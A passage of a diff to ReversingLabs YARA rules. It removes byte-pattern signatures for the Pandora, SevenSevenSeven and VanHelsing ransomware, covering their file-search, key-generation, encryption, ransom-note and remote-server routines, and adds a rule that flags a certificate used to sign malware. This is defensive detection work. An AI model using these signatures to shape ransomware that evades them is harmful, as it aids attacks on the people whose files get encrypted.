 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Pandora"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            41 57 41 56 41 55 41 54 56 57 55 53 48 83 EC ?? 48 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? 45 31 F6 41 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 89 4C 24 ?? 45 31 C0 41 81 FA ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F
-            4C CA 41 0F 94 C0 48 8B 8C 08 ?? ?? ?? ?? 48 01 F1 31 D2 31 DB 41 81 FA ?? ?? ?? ??
-            0F 9C C2 0F 95 C3 41 BD ?? ?? ?? ?? 49 29 D5 41 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 0F 4C FA 4C 8D 4C 9B ?? 41 BB ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 0F 44 DA
-            49 83 C8 ?? 31 DB 31 D2 41 81 FA ?? ?? ?? ?? 0F 9C C3 4C 8D 64 1B ?? 0F 94 C2 48 83
-            F2 ?? 31 DB 41 81 FA ?? ?? ?? ?? 0F 94 C3 48 8D 1C DB 48 83 C3 ?? EB ?? 0F 1F 40 ??
-            4A 8B AC C0 ?? ?? ?? ?? 48 01 F5 FF E5 FF E1 4A 8B AC E0 ?? ?? ?? ?? 48 01 F5 FF E5
-            48 8B AC D8 ?? ?? ?? ?? 48 01 F5 FF E5 0F 1F 80 ?? ?? ?? ?? 48 8B AC F8 ?? ?? ?? ??
-            48 01 F5 FF E5 4A 8B AC E8 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC D8 ?? ?? ?? ?? 48 01
-        }
-		$find_files_p2 = {
-            F5 FF E5 66 0F 1F 84 00 ?? ?? 00 00 48 8B AC D0 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC
-            C8 ?? ?? ?? ?? 48 01 F5 FF E5 44 89 74 24 ?? 48 63 4C 24 ?? 48 8B 54 24 ?? 48 8B 8C
-            CA ?? ?? ?? ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 8B 54 24 ?? BD ?? ?? ?? ?? 01 EA 44 8B
-            54 24 ?? BD ?? ?? ?? ?? 41 01 EA 66 83 39 ?? 44 0F 45 D2 E9 ?? ?? ?? ?? 45 31 FF EB
-            ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 90 41 BF ?? ?? ?? ?? 44 8B 54 24 ?? 41 81 C2 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 44 8B 74 24 ?? 41 83 C6 ?? 48 8B 54
-            24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 01 C8 48 8B 4C 24
-            ?? FF D0 8B 4C 24 ?? BA ?? ?? ?? ?? 01 D1 44 8B 54 24 ?? BA ?? ?? ?? ?? 41 01 D2 85
-            C0 44 0F 44 D1 E9 ?? ?? ?? ?? 44 89 F8 48 83 C4 ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41
-            5F C3
-        }
-		$generate_key = {
-            41 57 41 56 41 55 41 54 56 57 55 53 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48
-            8D B4 24 ?? ?? ?? ?? 48 89 74 24 ?? 48 8B 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 C7 C5 ??
-            ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 41 BC ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 01
-            E1 BA ?? ?? ?? ?? 48 03 15 ?? ?? ?? ?? FF D0 48 8B 05 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F
-            B7 90 ?? ?? ?? ?? 66 89 51 ?? 48 8B 80 ?? ?? ?? ?? 48 89 01 48 8B 05 ?? ?? ?? ?? 48
-            8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? ??
-            48 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ??
-            ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 89 F1 FF D0 48 98 4C 8B 05 ?? ?? ?? ?? 4D 01 E0
-            48 8B 0D ?? ?? ?? ?? 48 8B 99 ?? ?? ?? ?? 48 01 EB 48 8B 0D ?? ?? ?? ?? 4C 01 E1 48
-            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 49 89 F1 FF D3 89 84 24 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            45 31 ED 41 BE ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ??
-            BA ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 44 D7 48 8B 04 10 4C 01 F0 FF E0
-        }
-		$drop_ransom_note = {
-            48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ??
-            ?? BE ?? ?? ?? ?? 48 01 F1 48 8B 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 01 FA FF D0 48 8B
-            0D ?? ?? ?? ?? 48 01 F1 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 01 EA FF D2 48
-            8B 15 ?? ?? ?? ?? 48 01 F2 48 8B 8C 24 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B B6 ??
-            ?? ?? ?? 48 01 EE 48 C7 44 24 ?? ?? ?? ?? ?? 41 89 C0 4C 8D 4C 24 ?? FF D6 BE ?? ??
-            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 41 BE ?? ??
-            ?? ?? 48 01 EA FF D2 BF ?? ?? ?? ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
-            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
-            E0 8B 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
-            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
-            E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ??
-            BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01
-            C1 C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ??
-            ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ??
-            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 4C 01 F0 C7 44 24 ?? ?? ?? ?? ?? 48 8D
-            54 24 ?? 4C 8D 84 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? FF D0 BF ?? ?? ?? ?? 8B 54 24 ?? B9
-            ?? ?? ?? ?? 01 CA 8B 4C 24 ?? BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
-            48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 C0 48 81
-            C4 ?? ?? ?? ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "26:8c:0d:70:28:a1:54:ac:3b:63:49:c5" and 1474266712 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sevensevenseven : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects SevenSevenSeven ransomware."
-		author = "ReversingLabs"
-		id = "049531bd-9505-5da1-9512-980383c8c5ec"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.SevenSevenSeven.yara#L1-L148"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "583a8ac746cd749bd3927f10c864a3ac84f82f8bbd8d0ebf117e22b016d7ca94"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "SevenSevenSeven"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$file_search_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
-            ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 53 56 57 89 65 ?? BE ?? ?? ?? ?? 89 75
-            ?? 33 DB 89 5D ?? 88 5D ?? 89 75 ?? 89 5D ?? 88 5D ?? 89 75 ?? 88 5D ?? 68 ?? ?? ??
-            ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 53 50 8D 4D ?? E8
-            ?? ?? ?? ?? BF ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 90 6A ?? 53 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ??
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
-            53 50 8D 4D ?? E8 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 39 BD ?? ?? ??
-            ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ??
-            ?? ?? 88 9D ?? ?? ?? ?? 39 7D ?? 8B 75 ?? 73 ?? 8D 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0
-        }
-		$file_search_p2 = {
-            74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 3B
-            C3 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74
-            ?? 8B 45 ?? 3A C3 0F 84 ?? ?? ?? ?? 50 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 3B
-            F3 0F 84 ?? ?? ?? ?? 39 7D ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 7D ?? 72
-            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 88 5D ?? 39 7D
-            ?? 0F 82 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 38 1E 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 89 5D ??
-            39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB
-            ?? B8 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
-            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
-            3B C8 72 ?? 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ??
-            ?? ?? ?? C3 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B
-            F8 83 FF ?? 75 ?? 5F 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
-            ?? C3 53 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 57 FF 15 ?? ?? ?? ?? 5B 5F
-            5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 6A ?? FF 15
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 53 56
-            57 FF 15 ?? ?? ?? ?? 33 C0 85 DB 76 ?? 8D 49 ?? 80 34 30 ?? 40 3B C3 72 ?? 6A ?? 6A
-            ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 53 56 57 FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 0F B7 4C 24 ?? 0F B7
-            54 24 ?? 68 ?? ?? ?? ?? 50 0F B7 44 24 ?? 51 0F B7 4C 24 ?? 52 0F B7 54 24 ?? 50 51
-            52 55 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 55 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B
-            8C 24 ?? ?? ?? ?? 5B 5F 5E B8 ?? ?? ?? ?? 5D E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_2 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
-            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
-            3B C8 72 ?? 83 FE ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ??
-            ?? ?? ?? 8B F0 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4
-            ?? ?? ?? ?? C3 53 6A ?? 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 56 FF 15 ?? ?? ??
-            ?? 5B 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 57 8D 83
-            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8B F8 FF 15 ?? ?? ?? ??
-            6A ?? 8D 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 8B CB C1 E9 ?? 41 74 ?? 8D 47 ?? B2
-            ?? 80 70 ?? ?? 80 70 ?? ?? 80 30 ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ??
-            30 50 ?? 83 C0 ?? 49 75 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ??
-            52 53 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
-            0F B7 4C 24 ?? 0F B7 54 24 ?? 0F B7 44 24 ?? 68 ?? ?? ?? ?? 51 0F B7 4C 24 ?? 52 0F
-            B7 54 24 ?? 50 0F B7 44 24 ?? 51 52 50 55 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ??
-            ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15
-            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5B 5E B8 ?? ?? ?? ?? 5D E8
-            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$remote_server_1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 56 57 68 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 33 FF 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB
-            BD ?? ?? ?? ?? 8B 44 24 ?? BA ?? ?? ?? ?? 8B CB D3 E2 85 D0 0F 84 ?? ?? ?? ?? 8A CB
-            8D 54 24 ?? 80 C1 ?? 52 88 4C 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 44
-            24 ?? 50 FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D
-            50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 4C 24 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54
-            24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 44 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ??
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
-        }
-		$remote_server_2 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 57 33 FF 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 84
-            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ??
-            0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 87 ?? ?? ?? ?? 53 55 56 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
-            8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB BD ?? ??
-            ?? ?? 8B CB B8 ?? ?? ?? ?? D3 E0 8B 4C 24 ?? 85 C1 0F 84 ?? ?? ?? ?? 8A D3 8D 44 24
-            ?? 80 C2 ?? 50 88 54 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 4C 24 ?? 51
-            FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D 50 ?? 8A
-            08 40 84 C9 75 ?? 2B C2 50 8D 54 24 ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
-            8C 24 ?? ?? ?? ?? 5E 5D 5B 33 C0 5F E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 ?? ?? 57 FF
-            15
-        }
 
-	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $file_search_p* ) ) and ( ( ( $encrypt_file_1 ) and ( $remote_server_1 ) ) or ( ( $encrypt_file_2 ) and ( $remote_server_2 ) ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Vanhelsing : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects VanHelsing ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a12c5a00-523b-5644-aac5-e0f9d7e779b5"
-		date = "2025-06-10"
-		modified = "2025-06-10"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.VanHelsing.yara#L1-L464"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8a04dac3ede0d2fb63db8f97fc20bb83372a2adf5e760ea7c29e5f563cee7442"
-		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "VanHelsing"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$find_files_v1_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ??
-            8B 45 ?? 8B 5D ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 53 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ??
-            ?? 50 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B
-            3D ?? ?? ?? ?? 0F 1F 00 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 66 0F 1F 44 00 ?? FF 36 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 85 ?? ?? ?? ?? 83
-            C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85
-        }
-		$find_files_v1_p2 = {
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 66 0F 1F 44 00 ?? FF 36 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 85 ??
-            ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 0F 57 C0 83 C4
-            ?? 66 0F D6 06 C7 46 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 89 06 8B 85 ?? ?? ?? ?? 89 46 ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CE 85 C0 75 ?? E8 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 53 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 9D ??
